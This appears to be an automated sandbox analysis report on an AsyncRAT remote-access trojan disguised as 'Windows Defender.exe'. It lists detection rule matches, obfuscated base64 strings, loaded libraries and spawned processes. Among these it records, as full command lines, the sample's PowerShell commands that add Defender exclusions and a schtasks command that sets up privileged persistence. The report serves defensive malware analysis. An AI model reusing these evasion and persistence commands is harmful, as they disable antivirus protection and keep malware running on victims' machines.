                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD34693FFA5_2_00007FFD34693FFA
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD34695BF25_2_00007FFD34695BF2
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD347639D15_2_00007FFD347639D1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD34660D7D9_2_00007FFD34660D7D
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD34668E4C9_2_00007FFD34668E4C
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD346621FA9_2_00007FFD346621FA
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD34668EA09_2_00007FFD34668EA0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD34665BFA9_2_00007FFD34665BFA
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD347339D19_2_00007FFD347339D1
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeCode function: 18_2_00007FFD346916E918_2_00007FFD346916E9
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeCode function: 18_2_00007FFD34690E5E18_2_00007FFD34690E5E
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeCode function: 18_2_00007FFD346920C118_2_00007FFD346920C1
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeCode function: 20_2_00007FFD34660E5E20_2_00007FFD34660E5E
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeCode function: 20_2_00007FFD346616E920_2_00007FFD346616E9
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeCode function: 20_2_00007FFD346620C120_2_00007FFD346620C1
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeCode function: 21_2_00007FFD34680E5E21_2_00007FFD34680E5E
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeCode function: 21_2_00007FFD346816E921_2_00007FFD346816E9
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeCode function: 21_2_00007FFD346820C121_2_00007FFD346820C1
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeCode function: 22_2_00007FFD346916E922_2_00007FFD346916E9
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeCode function: 22_2_00007FFD34690E5E22_2_00007FFD34690E5E
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeCode function: 22_2_00007FFD346920C122_2_00007FFD346920C1
                      Source: Windows Defender.exe, 00000012.00000002.2916151946.00000000010EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Windows Defender.exe
                      Source: Windows Defender.exe, 00000014.00000002.2999231775.0000000001208000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Windows Defender.exe
                      Source: Windows Defender.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: Windows Defender.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 0.0.Windows Defender.exe.ad0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 0.2.Windows Defender.exe.12ea1a78.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 0.2.Windows Defender.exe.12ea1a78.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000000.00000002.3487954673.0000000012EA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000000.00000000.2229425020.0000000000AD2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: C:\Users\user\AppData\Local\Windows Defender.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: Windows Defender.exe, lSDAsIDH8m4Ei0iUo0fhSru3ByZItL2R1ZzgGlHTbgQng9oKNN87cEIG3jW4hf.csCryptographic APIs: 'TransformFinalBlock'
                      Source: Windows Defender.exe, lSDAsIDH8m4Ei0iUo0fhSru3ByZItL2R1ZzgGlHTbgQng9oKNN87cEIG3jW4hf.csCryptographic APIs: 'TransformFinalBlock'
                      Source: Windows Defender.exe, tBZCWm7wJKWrvEwJjCneXQvYCf0Z1Hh9jgOBkQZCmW6wv8woLGoDUWwpaSbAug.csCryptographic APIs: 'TransformFinalBlock'
                      Source: Windows Defender.exe.0.dr, lSDAsIDH8m4Ei0iUo0fhSru3ByZItL2R1ZzgGlHTbgQng9oKNN87cEIG3jW4hf.csCryptographic APIs: 'TransformFinalBlock'
                      Source: Windows Defender.exe.0.dr, lSDAsIDH8m4Ei0iUo0fhSru3ByZItL2R1ZzgGlHTbgQng9oKNN87cEIG3jW4hf.csCryptographic APIs: 'TransformFinalBlock'
                      Source: Windows Defender.exe.0.dr, tBZCWm7wJKWrvEwJjCneXQvYCf0Z1Hh9jgOBkQZCmW6wv8woLGoDUWwpaSbAug.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Windows Defender.exe.12ea1a78.0.raw.unpack, lSDAsIDH8m4Ei0iUo0fhSru3ByZItL2R1ZzgGlHTbgQng9oKNN87cEIG3jW4hf.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Windows Defender.exe.12ea1a78.0.raw.unpack, lSDAsIDH8m4Ei0iUo0fhSru3ByZItL2R1ZzgGlHTbgQng9oKNN87cEIG3jW4hf.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Windows Defender.exe.12ea1a78.0.raw.unpack, tBZCWm7wJKWrvEwJjCneXQvYCf0Z1Hh9jgOBkQZCmW6wv8woLGoDUWwpaSbAug.csCryptographic APIs: 'TransformFinalBlock'
                      Source: Windows Defender.exe, HJBx66YTogCOPv6cTw3RjJpSOE0J7seBb0RryZBqXUYad.csBase64 encoded string: 'zmJZIyrtAB6zwb1f3cBKTdulJiIzhjdwIuFClC8ghF0oFbRL03u0nsp4ST34knk0KtnLPPnziCwyaxeZ', 'KtAfEubdoqgU7cICy6SfkgZwYxxKlSU0UIxCrnYi9L7AC22NqLSInX5SQQOOQN6CqobVJrkVkSRLu20o'
                      Source: Windows Defender.exe, XTL63OWwlW8xwNxHliXe5MQAZDgir0OO3J3aDCgI2Uo9U.csBase64 encoded string: 'qpfyq9LnqydLzmLMJoytp9RlcPGNbjoZuIELFFeGJvfgvccNxSqqeegPEwuRf2CGFbeXsv57wC2wvyeP', 'ZdBNKi2pAGVj0XJjnVbQ8IaqTnqqZjnoJJTCp5ceaYAia1GD9ahP3yfmg1uwKkbkgLo0VZZsMMQ3heHc', 'mePsIuQX1hkcDpPdDepj1WrO7MpylVcOPpPxsV1V8NiJOnfAoUDFkP5xFrEJBhLIgMLDd1fACeNhJEm7'
                      Source: Windows Defender.exe, Xp5eWsWWhMglmS4zYSIjSD4w2EFmG57IhPNnHU1bP52sr.csBase64 encoded string: 'GPsvJuNjyTz65i2snoykbYCYGGsV9Vxx8jKabhUNwlOHrrVUmaULtbK4fsi9cjJjNn3r5iTsfY5zkm4E', 'SarhKHw13cWgtP0H3KWmgiIMCBfTOpF3IrJB2E99LRWcrq6JEKUwcJkmd6f2ww2WNAYglhZi4hmyB9SY', 'MxVwAF0eql5skfC77bwD5zYdBCylZBburbcgzGUOXir4alwX0NftAWcK38c90WrqYAlRp3PuUhPIgCOF', 'KKa07NLsmDpTsxajQ6Y8mLS0LcywJrzG0DX7zNLZ5nX4h0X234MQaiNTUmBxzee2m0Ndto4SJGZ4OJ4g', 'LCHTqglxmez1QAB3P08zS62lz8vOiSHpCyYRmZJnR4Bhc6BE16RiJ92ZVqYX43p0vhkeCUW1zZXD7fVU', 'GeQpkCq1V1er8Y0stflKKXqO4ywSCBCIIrsMie2gvnlQFtMtB4h4op0Xv8B0WkA5uaauQEON0koToNS4', 'Y38kNVzfWDKYks466lSDuLVTnGX9UPc5K0iucKQzESIIerjegKgKCLpQz1cF0NNRvWed8aj0wpjQOA4Y', 'JXnWiLyl8Wssr5AF2abVNGjE6yUO2l3urSLeYJ2MG77zylPnOLMDeqBhnK6mqtCNX9GGpN1ixT8Y6Lta', 'yLWZd6sMz8szo9fWvPSsiKiRNiaEq6MPoyT5n3xnZL9r4GCluJiGV115GI9jc2086Pp5sfw6Gp1twhK1'
                      Source: Windows Defender.exe.0.dr, HJBx66YTogCOPv6cTw3RjJpSOE0J7seBb0RryZBqXUYad.csBase64 encoded string: 'zmJZIyrtAB6zwb1f3cBKTdulJiIzhjdwIuFClC8ghF0oFbRL03u0nsp4ST34knk0KtnLPPnziCwyaxeZ', 'KtAfEubdoqgU7cICy6SfkgZwYxxKlSU0UIxCrnYi9L7AC22NqLSInX5SQQOOQN6CqobVJrkVkSRLu20o'
                      Source: Windows Defender.exe.0.dr, XTL63OWwlW8xwNxHliXe5MQAZDgir0OO3J3aDCgI2Uo9U.csBase64 encoded string: 'qpfyq9LnqydLzmLMJoytp9RlcPGNbjoZuIELFFeGJvfgvccNxSqqeegPEwuRf2CGFbeXsv57wC2wvyeP', 'ZdBNKi2pAGVj0XJjnVbQ8IaqTnqqZjnoJJTCp5ceaYAia1GD9ahP3yfmg1uwKkbkgLo0VZZsMMQ3heHc', 'mePsIuQX1hkcDpPdDepj1WrO7MpylVcOPpPxsV1V8NiJOnfAoUDFkP5xFrEJBhLIgMLDd1fACeNhJEm7'
                      Source: Windows Defender.exe.0.dr, Xp5eWsWWhMglmS4zYSIjSD4w2EFmG57IhPNnHU1bP52sr.csBase64 encoded string: 'GPsvJuNjyTz65i2snoykbYCYGGsV9Vxx8jKabhUNwlOHrrVUmaULtbK4fsi9cjJjNn3r5iTsfY5zkm4E', 'SarhKHw13cWgtP0H3KWmgiIMCBfTOpF3IrJB2E99LRWcrq6JEKUwcJkmd6f2ww2WNAYglhZi4hmyB9SY', 'MxVwAF0eql5skfC77bwD5zYdBCylZBburbcgzGUOXir4alwX0NftAWcK38c90WrqYAlRp3PuUhPIgCOF', 'KKa07NLsmDpTsxajQ6Y8mLS0LcywJrzG0DX7zNLZ5nX4h0X234MQaiNTUmBxzee2m0Ndto4SJGZ4OJ4g', 'LCHTqglxmez1QAB3P08zS62lz8vOiSHpCyYRmZJnR4Bhc6BE16RiJ92ZVqYX43p0vhkeCUW1zZXD7fVU', 'GeQpkCq1V1er8Y0stflKKXqO4ywSCBCIIrsMie2gvnlQFtMtB4h4op0Xv8B0WkA5uaauQEON0koToNS4', 'Y38kNVzfWDKYks466lSDuLVTnGX9UPc5K0iucKQzESIIerjegKgKCLpQz1cF0NNRvWed8aj0wpjQOA4Y', 'JXnWiLyl8Wssr5AF2abVNGjE6yUO2l3urSLeYJ2MG77zylPnOLMDeqBhnK6mqtCNX9GGpN1ixT8Y6Lta', 'yLWZd6sMz8szo9fWvPSsiKiRNiaEq6MPoyT5n3xnZL9r4GCluJiGV115GI9jc2086Pp5sfw6Gp1twhK1'
                      Source: 0.2.Windows Defender.exe.12ea1a78.0.raw.unpack, HJBx66YTogCOPv6cTw3RjJpSOE0J7seBb0RryZBqXUYad.csBase64 encoded string: 'zmJZIyrtAB6zwb1f3cBKTdulJiIzhjdwIuFClC8ghF0oFbRL03u0nsp4ST34knk0KtnLPPnziCwyaxeZ', 'KtAfEubdoqgU7cICy6SfkgZwYxxKlSU0UIxCrnYi9L7AC22NqLSInX5SQQOOQN6CqobVJrkVkSRLu20o'
                      Source: 0.2.Windows Defender.exe.12ea1a78.0.raw.unpack, XTL63OWwlW8xwNxHliXe5MQAZDgir0OO3J3aDCgI2Uo9U.csBase64 encoded string: 'qpfyq9LnqydLzmLMJoytp9RlcPGNbjoZuIELFFeGJvfgvccNxSqqeegPEwuRf2CGFbeXsv57wC2wvyeP', 'ZdBNKi2pAGVj0XJjnVbQ8IaqTnqqZjnoJJTCp5ceaYAia1GD9ahP3yfmg1uwKkbkgLo0VZZsMMQ3heHc', 'mePsIuQX1hkcDpPdDepj1WrO7MpylVcOPpPxsV1V8NiJOnfAoUDFkP5xFrEJBhLIgMLDd1fACeNhJEm7'
                      Source: 0.2.Windows Defender.exe.12ea1a78.0.raw.unpack, Xp5eWsWWhMglmS4zYSIjSD4w2EFmG57IhPNnHU1bP52sr.csBase64 encoded string: 'GPsvJuNjyTz65i2snoykbYCYGGsV9Vxx8jKabhUNwlOHrrVUmaULtbK4fsi9cjJjNn3r5iTsfY5zkm4E', 'SarhKHw13cWgtP0H3KWmgiIMCBfTOpF3IrJB2E99LRWcrq6JEKUwcJkmd6f2ww2WNAYglhZi4hmyB9SY', 'MxVwAF0eql5skfC77bwD5zYdBCylZBburbcgzGUOXir4alwX0NftAWcK38c90WrqYAlRp3PuUhPIgCOF', 'KKa07NLsmDpTsxajQ6Y8mLS0LcywJrzG0DX7zNLZ5nX4h0X234MQaiNTUmBxzee2m0Ndto4SJGZ4OJ4g', 'LCHTqglxmez1QAB3P08zS62lz8vOiSHpCyYRmZJnR4Bhc6BE16RiJ92ZVqYX43p0vhkeCUW1zZXD7fVU', 'GeQpkCq1V1er8Y0stflKKXqO4ywSCBCIIrsMie2gvnlQFtMtB4h4op0Xv8B0WkA5uaauQEON0koToNS4', 'Y38kNVzfWDKYks466lSDuLVTnGX9UPc5K0iucKQzESIIerjegKgKCLpQz1cF0NNRvWed8aj0wpjQOA4Y', 'JXnWiLyl8Wssr5AF2abVNGjE6yUO2l3urSLeYJ2MG77zylPnOLMDeqBhnK6mqtCNX9GGpN1ixT8Y6Lta', 'yLWZd6sMz8szo9fWvPSsiKiRNiaEq6MPoyT5n3xnZL9r4GCluJiGV115GI9jc2086Pp5sfw6Gp1twhK1'
                      Source: 0.2.Windows Defender.exe.12ea1a78.0.raw.unpack, Q5rYqmkFrCyjhTqjwG8qAWrGPcnIHyXyeJNHX3ZoPPK3S367NSagfidADR3o0oG7aigItouSGKdHm.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 0.2.Windows Defender.exe.12ea1a78.0.raw.unpack, Q5rYqmkFrCyjhTqjwG8qAWrGPcnIHyXyeJNHX3ZoPPK3S367NSagfidADR3o0oG7aigItouSGKdHm.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: Windows Defender.exe.0.dr, Q5rYqmkFrCyjhTqjwG8qAWrGPcnIHyXyeJNHX3ZoPPK3S367NSagfidADR3o0oG7aigItouSGKdHm.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: Windows Defender.exe.0.dr, Q5rYqmkFrCyjhTqjwG8qAWrGPcnIHyXyeJNHX3ZoPPK3S367NSagfidADR3o0oG7aigItouSGKdHm.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: Windows Defender.exe, Q5rYqmkFrCyjhTqjwG8qAWrGPcnIHyXyeJNHX3ZoPPK3S367NSagfidADR3o0oG7aigItouSGKdHm.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: Windows Defender.exe, Q5rYqmkFrCyjhTqjwG8qAWrGPcnIHyXyeJNHX3ZoPPK3S367NSagfidADR3o0oG7aigItouSGKdHm.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: classification engineClassification label: mal100.troj.evad.winEXE@20/21@2/2
                      Source: C:\Users\user\Desktop\Windows Defender.exeFile created: C:\Users\user\AppData\Local\Windows Defender.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4328:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1280:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6768:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6068:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3856:120:WilError_03
                      Source: C:\Users\user\Desktop\Windows Defender.exeMutant created: \Sessions\1\BaseNamedObjects\WR2rJvQsDgMo0fED
                      Source: C:\Users\user\Desktop\Windows Defender.exeFile created: C:\Users\user\AppData\Local\Temp\Log.tmpJump to behavior
                      Source: Windows Defender.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: Windows Defender.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                      Source: C:\Users\user\Desktop\Windows Defender.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: Windows Defender.exeReversingLabs: Detection: 81%
                      Source: C:\Users\user\Desktop\Windows Defender.exeFile read: C:\Users\user\Desktop\Windows Defender.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\Windows Defender.exe "C:\Users\user\Desktop\Windows Defender.exe"
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Windows Defender.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Defender.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Windows Defender.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Defender.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Defender" /tr "C:\Users\user\AppData\Local\Windows Defender.exe"
                      Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Windows Defender.exe "C:\Users\user\AppData\Local\Windows Defender.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Windows Defender.exe "C:\Users\user\AppData\Local\Windows Defender.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Windows Defender.exe "C:\Users\user\AppData\Local\Windows Defender.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Windows Defender.exe "C:\Users\user\AppData\Local\Windows Defender.exe"
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Windows Defender.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Defender.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Windows Defender.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Defender.exe'Jump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Defender" /tr "C:\Users\user\AppData\Local\Windows Defender.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: linkinfo.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: ntshrui.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: avicap32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: msvfw32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
